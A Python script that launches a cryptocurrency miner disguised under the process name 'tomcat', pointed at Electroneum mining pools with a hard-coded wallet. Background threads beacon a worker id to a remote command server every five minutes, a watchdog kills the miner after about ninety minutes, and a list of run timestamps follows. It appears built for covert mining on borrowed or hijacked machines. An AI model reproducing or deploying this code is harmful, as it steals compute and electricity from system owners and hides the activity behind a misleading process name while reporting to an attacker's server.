import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:37:06.571695
#2018-02-17 16:24:01.924232
#2018-02-17 18:11:05.635043
#2018-02-17 19:59:06.744732
#2018-02-17 21:47:06.109692
#2018-02-17 23:32:03.873449
#2018-02-18 01:21:06.271685
#2018-02-18 03:08:07.319184
#2018-02-18 04:55:06.681120
#2018-02-18 06:46:07.654462
#2018-02-18 08:36:04.787257
#2018-02-18 10:22:07.399736
#2018-02-18 12:08:07.360401
#2018-02-18 13:53:01.253379
#2018-02-18 15:44:04.613197
#2018-02-18 17:35:03.039451
#2018-02-18 19:22:06.958904
#2018-02-18 21:07:07.118173
#2018-02-18 22:54:04.957877
#2018-02-19 00:42:05.197976
#2018-02-19 02:28:06.047441
#2018-02-19 04:15:07.170312
#2018-02-19 06:01:04.265832
#2018-02-19 07:50:01.718592
#2018-02-19 09:40:05.339193
#2018-02-19 11:28:08.292629
#2018-02-19 13:14:04.658272
#2018-02-19 15:03:09.405218
#2018-02-19 16:52:08.495394
#2018-02-19 18:40:10.957724
#2018-02-19 20:26:06.043121
#2018-02-19 22:14:04.224256
#2018-02-20 00:00:09.781094
#2018-02-20 01:47:01.457879
#2018-02-20 03:34:02.095758
#2018-02-20 05:21:05.675995
#2018-02-20 07:05:09.007207
#2018-02-20 08:51:03.808091
#2018-02-20 10:35:03.768816
#2018-02-20 12:21:06.476017
#2018-02-20 14:08:06.074220
#2018-02-20 15:51:08.820741
#2018-02-20 17:39:04.427802
#2018-02-20 19:27:08.720586
#2018-02-20 21:15:08.925418
#2018-02-20 23:01:04.254712
#2018-02-21 00:44:07.203840
#2018-02-21 02:29:06.588866
#2018-02-21 04:18:03.685348
#2018-02-21 06:06:05.439177
#2018-02-21 07:52:01.497059
#2018-02-21 09:37:05.209681
#2018-02-21 11:25:09.496964
#2018-02-21 13:15:05.340303
#2018-02-21 15:01:06.229932
#2018-02-21 16:52:11.652775
#2018-02-21 18:43:02.088459
#2018-02-21 20:28:06.280006
#2018-02-21 22:16:08.832147
#2018-02-22 00:05:06.276663
#2018-02-22 01:55:08.435441
#2018-02-22 03:42:07.782409
#2018-02-22 05:29:01.425981
#2018-02-22 07:14:08.109599
#2018-02-22 09:02:04.620678
#2018-02-22 10:49:08.980268
#2018-02-22 12:35:07.852343
#2018-02-22 14:20:05.294656
#2018-02-22 16:07:07.233433
#2018-02-22 17:53:08.551282
#2018-02-22 19:41:06.311864
#2018-02-22 21:33:07.441422
#2018-02-22 23:22:01.774636
#2018-02-23 01:08:07.276444
#2018-02-23 02:56:01.492657
#2018-02-23 04:41:03.943907
#2018-02-23 06:26:07.004254
#2018-02-23 08:13:07.712379
#2018-02-23 10:28:07.350593
#2018-02-23 12:22:08.355364
#2018-02-23 14:12:08.879735
#2018-02-23 16:02:04.021356
#2018-02-23 17:48:09.744097
#2018-02-23 19:35:06.487257
#2018-02-23 21:18:01.326693
#2018-02-23 23:06:04.079190
#2018-02-24 00:50:08.243983
#2018-02-24 02:34:03.518826
#2018-02-24 04:27:04.666192
#2018-02-24 06:13:01.392611
#2018-02-24 08:01:04.182522
#2018-02-24 09:45:09.082908
#2018-02-24 11:40:08.899084
#2018-02-24 13:32:05.353566
#2018-02-24 15:20:04.280041
#2018-02-24 17:10:08.309294
#2018-02-24 19:01:07.954130
#2018-02-24 20:49:04.402114
#2018-02-24 23:07:05.707120
#2018-02-25 02:23:01.612425
#2018-02-25 05:37:06.999587
#2018-02-25 11:35:07.386565